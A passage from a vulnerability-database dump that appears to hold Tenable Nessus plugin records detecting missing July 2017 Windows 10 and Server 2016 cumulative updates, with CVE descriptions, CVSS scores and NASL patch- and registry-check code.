(CVE-2017-8596)\n\n - Multiple remote code execution vulnerability exist in\n Microsoft Edge in the scripting engine due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit these, by convincing a user\n to visit a specially crafted website, to execute\n arbitrary code in the context of the current user.\n (CVE-2017-8598, CVE-2017-8603, CVE-2017-8604,\n CVE-2017-8605, CVE-2017-8610, CVE-2017-8619)\n\n - A security bypass vulnerability exists in Microsoft Edge\n due to a failure to correctly apply the same-origin\n policy for HTML elements present in other browser\n windows. An unauthenticated, remote attacker can exploit\n this, by convincing a user to follow a link, to cause\n the user to load a malicious website. (CVE-2017-8599)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8601)\n\n - A spoofing vulnerability exists in Microsoft browsers\n due to improper parsing of HTTP content. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to click a specially crafted URL, to\n redirect the user to a malicious website.\n (CVE-2017-8602)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit these, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8606, CVE-2017-8607, CVE-2017-8608)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the scripting engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8609)\n\n - A spoofing vulnerability exists in Microsoft Edge due to\n improper parsing of HTTP content. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to click a specially crafted URL, to redirect the user\n to a malicious website. (CVE-2017-8611)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n this, by convincing a user to visit a specially crafted\n website, to execute arbitrary code in the context of the\n current user. (CVE-2017-8617)\n\n - A remote code execution vulnerability exists in Internet\n Explorer in the VBScript engine due to improper handling\n of objects in memory. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to execute arbitrary code\n in the context of the current user. (CVE-2017-8618)\");\n # https://support.microsoft.com/en-us/help/4025342/windows-10-update-kb4025342\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8811feb6\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4025342.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\",value:\"2017/07/11\");\n script_set_attribute(attribute:\"patch_publication_date\",value:\"2017/07/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/11\");\n\n script_set_attribute(attribute:\"plugin_type\",value:\"local\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'ms17-07';\nkbs = make_list(\n '4025342' # 10 1703 \n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"2016\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (\n # 10 (1703)\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"15063\",\n rollup_date: \"07_2017\",\n bulletin:bulletin,\n rollup_kb_list:make_list(4025342))\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-19T05:12:43", "description": "The remote Windows host is missing security update KB4025339. It is,\ntherefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists in the\n Windows Performance Monitor Console due to improper\n parsing of XML input that contains a reference to an\n external entity. An unauthenticated, remote attacker\n can exploit this, by convincing a user to create a\n Data Collector Set and import a specially crafted XML\n file, to disclose arbitrary files via an XML external\n entity (XXE) declaration. (CVE-2017-0170)\n\n - A remote code execution vulnerability exists in Windows\n Explorer due to improper handling of executable files\n and shares during rename operations. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to open a specially crafted file, to execute arbitrary\n code in the context of the current user. (CVE-2017-8463)\n\n - Multiple elevation of privilege vulnerabilities exist in\n the Microsoft Graphics component due to improper\n handling of objects in memory. A local attacker can\n exploit these, via a specially crafted application, to\n run arbitrary code in kernel mode. (CVE-2017-8467,\n CVE-2017-8556, CVE-2017-8573, CVE-2017-8574,\n CVE-2017-8577, CVE-2017-8578, CVE-2017-8580)\n\n - An information disclosure vulnerability exists in Win32k\n due to improper handling of objects in memory. A local\n attacker can exploit this, via a specially crafted\n application, to disclose sensitive information.\n (CVE-2017-8486)\n\n - A security bypass vulnerability exists in Microsoft\n Windows when handling Kerberos ticket exchanges due to a\n failure to prevent tampering with the SNAME field. A\n man-in-the-middle attacker can exploit this to bypass\n the Extended Protection for Authentication security\n feature. (CVE-2017-8495)\n\n - An information disclosure vulnerability exists in the\n Windows System Information Console due to improper\n parsing of XML input that contains a reference to an\n external entity. An unauthenticated, remote attacker\n can exploit this, by convincing a user to open a\n specially crafted file, to disclose arbitrary files via\n an XML external entity (XXE) declaration.\n (CVE-2017-8557)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. (CVE-2017-8561)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper handling of calls to Advanced\n Local Procedure Call (ALPC). An authenticated, remote\n attacker can exploit this via a specially crafted\n application, to run processes in an elevated context.\n (CVE-2017-8562)\n\n - An elevation of privilege vulnerability exists in\n Windows due to Kerberos falling back to NT LAN Manager\n (NTLM) Authentication Protocol as the default\n authentication protocol. An authenticated, remote\n attacker can exploit this, via an application that\n sends specially crafted traffic to a domain controller,\n to run processes in an elevated context.\n (CVE-2017-8563)*\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. An authenticated, remote attacker can exploit\n this, via a specially crafted application, to bypass\n Kernel Address Space Layout Randomization (KASLR) and\n disclose the base address of the kernel driver.\n (CVE-2017-8564)\n\n - A remote code execution vulnerability exists in\n PowerShell when handling a PSObject that wraps a CIM\n instance. An authenticated, remote attacker can exploit\n this, via a specially crafted script, to execute\n arbitrary code in a PowerShell remote session.\n (CVE-2017-8565)\n\n - An elevation of privilege vulnerability exists in\n Windows Input Method Editor (IME) due to improper\n handling of parameters in a method of a DCOM class. A\n local attacker can exploit this, via a specially crafted\n application, to run processes in an elevated context.\n (CVE-2017-8566)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper handling of objects in memory. A\n local attacker can exploit this, via a specially crafted\n application, to run arbitrary code in kernel mode.\n (CVE-2017-8581)\n\n - An information disclosure vulnerability exists in the\n HTTP.sys server application component due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted request, to disclose sensitive information.\n (CVE-2017-8582)\n\n - A remote code execution vulnerability exists in\n Microsoft HoloLens due to improper handling of objects\n in memory. An unauthenticated, remote attacker can\n exploit this, via a specially crafted packet, to execute\n arbitrary code. (CVE-2017-8584)\n\n - A denial of service vulnerability exists in the\n Microsoft Common Runtime Library component due to\n improper handling of web requests. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted request, to cause a denial of service condition\n in a .NET application. (CVE-2017-8585)\n\n - A remote code execution vulnerability exists in WordPad\n due to improper parsing of specially crafted files. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to open a specially crafted file, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-8588)\n\n - A remote code execution vulnerability exists in the\n Windows Search component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by sending specially crafted messages\n to the Windows Search service, to elevate privileges and\n execute arbitrary code. (CVE-2017-8589)\n\n - An elevation of privilege vulnerability exists in the\n Windows Common Log File System (CLFS) driver due to\n improper handling of objects in memory. A local attacker\n can exploit this, via a specially crafted application,\n to run processes in an elevated context. (CVE-2017-8590)\n\n - A security bypass vulnerability exists in Microsoft\n browsers due to improper handling of redirect requests.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to bypass CORS redirect restrictions. (CVE-2017-8592)\n\n - Multiple remote code execution vulnerability exist in\n Microsoft Edge in the scripting engine due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit these, by convincing a user\n to visit a specially crafted website, to execute\n arbitrary code in the context of the current user.\n (CVE-2017-8595, CVE-2017-8598, CVE-2017-8603,\n CVE-2017-8604, CVE-2017-8605, CVE-2017-8619)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n this, by convincing a user to visit a specially crafted\n website, to execute arbitrary code in the context of the\n current user. (CVE-2017-8596)\n\n - A security bypass vulnerability exists in Microsoft Edge\n due to a failure to correctly apply the same-origin\n policy for HTML elements present in other browser\n windows. An unauthenticated, remote attacker can exploit\n this, by convincing a user to follow a link, to cause\n the user to load a malicious website. (CVE-2017-8599)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8601)\n\n - A spoofing vulnerability exists in Microsoft browsers\n due to improper parsing of HTTP content. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to click a specially crafted URL, to\n redirect the user to a malicious website.\n (CVE-2017-8602)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit these, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8606, CVE-2017-8607, CVE-2017-8608)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the scripting engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8609)\n\n - A spoofing vulnerability exists in Microsoft Edge due to\n improper parsing of HTTP content. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to click a specially crafted URL, to redirect the user\n to a malicious website. (CVE-2017-8611)\n\n - A remote code execution vulnerability exists in Internet\n Explorer in the VBScript engine due to improper handling\n of objects in memory. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to execute arbitrary code\n in the context of the current user. (CVE-2017-8618)\n\n * note CVE-2017-8563 introduces a registry setting that\n administrators can use to help make LDAP authentication\n over SSL/TLS more secure, administrators need to create\n a LdapEnforceChannelBinding registry setting on machine\n running AD DS or AD LDS.", "edition": 32, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-07-11T00:00:00", "title": "KB4025339: Windows 10 Version 1607 and Windows Server 2016 July 2017 Cumulative Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0170", "CVE-2017-8578", "CVE-2017-8608", "CVE-2017-8566", "CVE-2017-8486", "CVE-2017-8588", "CVE-2017-8580", "CVE-2017-8573", "CVE-2017-8599", "CVE-2017-8574", "CVE-2017-8564", "CVE-2017-8556", "CVE-2017-8606", "CVE-2017-8619", "CVE-2017-8598", "CVE-2017-8607", "CVE-2017-8604", "CVE-2017-8601", "CVE-2017-8565", "CVE-2017-8596", "CVE-2017-8603", "CVE-2017-8605", "CVE-2017-8561", "CVE-2017-8467", "CVE-2017-8585", "CVE-2017-8562", "CVE-2017-8495", "CVE-2017-8609", "CVE-2017-8563", "CVE-2017-8589", "CVE-2017-8592", "CVE-2017-8584", "CVE-2017-8557", "CVE-2017-8581", "CVE-2017-8595", "CVE-2017-8611", "CVE-2017-8577", "CVE-2017-8582", "CVE-2017-8602", "CVE-2017-8618", "CVE-2017-8463", "CVE-2017-8590"], "modified": "2017-07-11T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS17_JUL_4025339.NASL", "href": "https://www.tenable.com/plugins/nessus/101366", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101366);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/18\");\n\n script_cve_id(\n \"CVE-2017-0170\",\n \"CVE-2017-8463\",\n \"CVE-2017-8467\",\n \"CVE-2017-8486\",\n \"CVE-2017-8495\",\n \"CVE-2017-8556\",\n \"CVE-2017-8557\",\n \"CVE-2017-8561\",\n \"CVE-2017-8562\",\n \"CVE-2017-8563\",\n \"CVE-2017-8564\",\n \"CVE-2017-8565\",\n \"CVE-2017-8566\",\n \"CVE-2017-8573\",\n \"CVE-2017-8574\",\n \"CVE-2017-8577\",\n \"CVE-2017-8578\",\n \"CVE-2017-8580\",\n \"CVE-2017-8581\",\n \"CVE-2017-8582\",\n \"CVE-2017-8584\",\n \"CVE-2017-8585\",\n \"CVE-2017-8588\",\n \"CVE-2017-8589\",\n \"CVE-2017-8590\",\n \"CVE-2017-8592\",\n \"CVE-2017-8595\",\n \"CVE-2017-8596\",\n \"CVE-2017-8598\",\n \"CVE-2017-8599\",\n \"CVE-2017-8601\",\n \"CVE-2017-8602\",\n \"CVE-2017-8603\",\n \"CVE-2017-8604\",\n \"CVE-2017-8605\",\n \"CVE-2017-8606\",\n \"CVE-2017-8607\",\n \"CVE-2017-8608\",\n \"CVE-2017-8609\",\n \"CVE-2017-8611\",\n \"CVE-2017-8618\",\n \"CVE-2017-8619\"\n );\n script_bugtraq_id(\n 99387,\n 99388,\n 99389,\n 99390,\n 99391,\n 99392,\n 99393,\n 99394,\n 99396,\n 99397,\n 99398,\n 99399,\n 99400,\n 99402,\n 99403,\n 99404,\n 99405,\n 99406,\n 99407,\n 99408,\n 99409,\n 99410,\n 99412,\n 99414,\n 99416,\n 99417,\n 99418,\n 99419,\n 99420,\n 99421,\n 99423,\n 99424,\n 99425,\n 99426,\n 99427,\n 99428,\n 99429,\n 99431,\n 99432,\n 99434,\n 99438,\n 99439\n );\n script_xref(name:\"MSKB\", value:\"4025339\");\n script_xref(name:\"MSFT\", value:\"MS17-4025339\");\n\n script_name(english:\"KB4025339: Windows 10 Version 1607 and Windows Server 2016 July 2017 Cumulative Update\");\n script_summary(english:\"Checks for presence of the patch rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update KB4025339. It is,\ntherefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists in the\n Windows Performance Monitor Console due to improper\n parsing of XML input that contains a reference to an\n external entity. An unauthenticated, remote attacker\n can exploit this, by convincing a user to create a\n Data Collector Set and import a specially crafted XML\n file, to disclose arbitrary files via an XML external\n entity (XXE) declaration. (CVE-2017-0170)\n\n - A remote code execution vulnerability exists in Windows\n Explorer due to improper handling of executable files\n and shares during rename operations. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to open a specially crafted file, to execute arbitrary\n code in the context of the current user. (CVE-2017-8463)\n\n - Multiple elevation of privilege vulnerabilities exist in\n the Microsoft Graphics component due to improper\n handling of objects in memory. A local attacker can\n exploit these, via a specially crafted application, to\n run arbitrary code in kernel mode. (CVE-2017-8467,\n CVE-2017-8556, CVE-2017-8573, CVE-2017-8574,\n CVE-2017-8577, CVE-2017-8578, CVE-2017-8580)\n\n - An information disclosure vulnerability exists in Win32k\n due to improper handling of objects in memory. A local\n attacker can exploit this, via a specially crafted\n application, to disclose sensitive information.\n (CVE-2017-8486)\n\n - A security bypass vulnerability exists in Microsoft\n Windows when handling Kerberos ticket exchanges due to a\n failure to prevent tampering with the SNAME field. A\n man-in-the-middle attacker can exploit this to bypass\n the Extended Protection for Authentication security\n feature. (CVE-2017-8495)\n\n - An information disclosure vulnerability exists in the\n Windows System Information Console due to improper\n parsing of XML input that contains a reference to an\n external entity. An unauthenticated, remote attacker\n can exploit this, by convincing a user to open a\n specially crafted file, to disclose arbitrary files via\n an XML external entity (XXE) declaration.\n (CVE-2017-8557)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. (CVE-2017-8561)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper handling of calls to Advanced\n Local Procedure Call (ALPC). An authenticated, remote\n attacker can exploit this via a specially crafted\n application, to run processes in an elevated context.\n (CVE-2017-8562)\n\n - An elevation of privilege vulnerability exists in\n Windows due to Kerberos falling back to NT LAN Manager\n (NTLM) Authentication Protocol as the default\n authentication protocol. An authenticated, remote\n attacker can exploit this, via an application that\n sends specially crafted traffic to a domain controller,\n to run processes in an elevated context.\n (CVE-2017-8563)*\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. An authenticated, remote attacker can exploit\n this, via a specially crafted application, to bypass\n Kernel Address Space Layout Randomization (KASLR) and\n disclose the base address of the kernel driver.\n (CVE-2017-8564)\n\n - A remote code execution vulnerability exists in\n PowerShell when handling a PSObject that wraps a CIM\n instance. An authenticated, remote attacker can exploit\n this, via a specially crafted script, to execute\n arbitrary code in a PowerShell remote session.\n (CVE-2017-8565)\n\n - An elevation of privilege vulnerability exists in\n Windows Input Method Editor (IME) due to improper\n handling of parameters in a method of a DCOM class. A\n local attacker can exploit this, via a specially crafted\n application, to run processes in an elevated context.\n (CVE-2017-8566)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper handling of objects in memory. A\n local attacker can exploit this, via a specially crafted\n application, to run arbitrary code in kernel mode.\n (CVE-2017-8581)\n\n - An information disclosure vulnerability exists in the\n HTTP.sys server application component due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted request, to disclose sensitive information.\n (CVE-2017-8582)\n\n - A remote code execution vulnerability exists in\n Microsoft HoloLens due to improper handling of objects\n in memory. An unauthenticated, remote attacker can\n exploit this, via a specially crafted packet, to execute\n arbitrary code. (CVE-2017-8584)\n\n - A denial of service vulnerability exists in the\n Microsoft Common Runtime Library component due to\n improper handling of web requests. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted request, to cause a denial of service condition\n in a .NET application. (CVE-2017-8585)\n\n - A remote code execution vulnerability exists in WordPad\n due to improper parsing of specially crafted files. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to open a specially crafted file, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-8588)\n\n - A remote code execution vulnerability exists in the\n Windows Search component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by sending specially crafted messages\n to the Windows Search service, to elevate privileges and\n execute arbitrary code. (CVE-2017-8589)\n\n - An elevation of privilege vulnerability exists in the\n Windows Common Log File System (CLFS) driver due to\n improper handling of objects in memory. A local attacker\n can exploit this, via a specially crafted application,\n to run processes in an elevated context. (CVE-2017-8590)\n\n - A security bypass vulnerability exists in Microsoft\n browsers due to improper handling of redirect requests.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to bypass CORS redirect restrictions. (CVE-2017-8592)\n\n - Multiple remote code execution vulnerability exist in\n Microsoft Edge in the scripting engine due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit these, by convincing a user\n to visit a specially crafted website, to execute\n arbitrary code in the context of the current user.\n (CVE-2017-8595, CVE-2017-8598, CVE-2017-8603,\n CVE-2017-8604, CVE-2017-8605, CVE-2017-8619)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n this, by convincing a user to visit a specially crafted\n website, to execute arbitrary code in the context of the\n current user. (CVE-2017-8596)\n\n - A security bypass vulnerability exists in Microsoft Edge\n due to a failure to correctly apply the same-origin\n policy for HTML elements present in other browser\n windows. An unauthenticated, remote attacker can exploit\n this, by convincing a user to follow a link, to cause\n the user to load a malicious website. (CVE-2017-8599)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8601)\n\n - A spoofing vulnerability exists in Microsoft browsers\n due to improper parsing of HTTP content. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to click a specially crafted URL, to\n redirect the user to a malicious website.\n (CVE-2017-8602)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit these, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8606, CVE-2017-8607, CVE-2017-8608)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the scripting engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8609)\n\n - A spoofing vulnerability exists in Microsoft Edge due to\n improper parsing of HTTP content. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to click a specially crafted URL, to redirect the user\n to a malicious website. (CVE-2017-8611)\n\n - A remote code execution vulnerability exists in Internet\n Explorer in the VBScript engine due to improper handling\n of objects in memory. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to execute arbitrary code\n in the context of the current user. (CVE-2017-8618)\n\n * note CVE-2017-8563 introduces a registry setting that\n administrators can use to help make LDAP authentication\n over SSL/TLS more secure, administrators need to create\n a LdapEnforceChannelBinding registry setting on machine\n running AD DS or AD LDS.\");\n # https://support.microsoft.com/en-us/help/4025339/windows-10-update-kb4025339\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9415d772\");\n # https://support.microsoft.com/en-us/help/4034879/how-to-add-the-ldapenforcechannelbinding-registry-entry\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?00f4a98e\");\n script_set_attribute(attribute:\"solution\", value: \n\"Apply security update KB4025339 as well as refer to the KB article for additional information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8589\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\n## NB: Microsoft \nbulletin = 'MS17-07';\nkbs = make_list(4025339);\n\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\n# Update only applies to Window 10 1607 / Server 2016\nif (hotfix_check_sp_range(win10:'0') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_nano() == 1) audit(AUDIT_OS_NOT, \"a currently supported OS (Windows Nano Server)\");\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nvuln = FALSE;\n\n# CVE-2017-8563 applies to both OSes and a\n# registry key is required if the target is\n# a domain controller.\nregistry_init();\nhklm = registry_hive_connect(hive:HKEY_LOCAL_MACHINE, exit_on_fail:TRUE);\n\n# Is target a DC?\nret = get_registry_value(\n handle:hklm,\n item:\"SYSTEM\\CurrentControlSet\\Control\\ProductOptions\\ProductType\"\n);\n\nmy_os_build = get_kb_item(\"SMB/WindowsVersionBuild\");\n\nif (!isnull(ret) && ret == 'LanmanNT' && my_os_build == '14393')\n{\n # Target is a DC.\n # Does target have required key for CVE-2017-8563 fix?\n ret = get_registry_value(\n handle:hklm,\n item:\"SYSTEM\\CurrentControlSet\\Services\\NTDS\\Parameters\\LdapEnforceChannelBinding\"\n );\n if (isnull(ret) || (ret != '1' && ret != '2'))\n {\n vuln = TRUE;\n reg_key_note =\n '\\n The registry key \"HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\Parameters\\\\LdapEnforceChannelBinding\"' +\n '\\n is missing or is not equal to \"1\" or \"2\"' +\n '\\n';\n hotfix_add_report(reg_key_note, bulletin:bulletin);\n }\n}\n\nRegCloseKey(handle:hklm);\nclose_registry(close:FALSE);\n\n\nif (\n # Windows 10 1607 / Server 2016\n smb_check_rollup(os:\"10\", sp:0, os_build:\"14393\", rollup_date:\"07_2017\", bulletin:bulletin, rollup_kb_list:kbs) ||\n vuln\n)\n{\n replace_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T18:30:54", "description": "The remote Windows 10 version 1511 host is missing security update\nKB4025344. It is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists in the\n Windows Performance Monitor Console due to improper\n parsing of XML input that contains a reference to an\n external entity. An unauthenticated, remote attacker\n can exploit this, by convincing a user to create a\n Data Collector Set and import a specially crafted XML\n file, to disclose arbitrary files via an XML external\n entity (XXE) declaration. (CVE-2017-0170)\n\n - A remote code execution vulnerability exists in Windows\n Explorer due to improper handling of executable files\n and shares during rename operations. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to open a specially crafted file, to execute arbitrary\n code in the context of the current user. (CVE-2017-8463)\n\n - Multiple elevation of privilege vulnerabilities exist in\n the Microsoft Graphics component due to improper\n handling of objects in memory. A local attacker can\n exploit these, via a specially crafted application, to\n run arbitrary code in kernel mode. (CVE-2017-8467,\n CVE-2017-8556, CVE-2017-8573, CVE-2017-8577,\n CVE-2017-8578, CVE-2017-8580)\n\n - An information disclosure 